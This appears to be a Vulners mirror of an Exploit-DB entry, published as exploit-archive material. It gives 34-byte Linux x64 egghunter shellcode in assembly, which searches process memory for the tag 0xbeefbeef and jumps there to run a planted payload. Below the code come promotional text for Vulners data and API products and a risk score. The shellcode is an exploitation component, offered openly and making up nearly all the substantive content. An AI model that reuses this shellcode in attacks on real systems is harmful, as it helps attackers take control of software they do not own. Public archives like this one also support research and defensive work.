Lucene search
K

Linux/x64 - Egghunter (0xbeefbeef) Shellcode (34 bytes)

🗓️ 23 Nov 2017 00:00:00Reported by Exploit-DBType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 23 Views

Linux/x64 Egghunter shellcode for locating specific tag (34 bytes

Code
global _start
section .text
_start:
        xor rsi,rsi

        push rsi ; starts the search at position 0
        pop rdi

next_page:
        or di,0xfff
        inc rdi

next_4_bytes:
        push 21
        pop rax
        syscall
        cmp al,0xf2
        jz next_page
        mov eax,0xefbeefbd
        inc al
        scasd
        jnz next_4_bytes
        jmp rdi

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Nov 2017 00:00Current
7.1High risk
Vulners AI Score7.1
23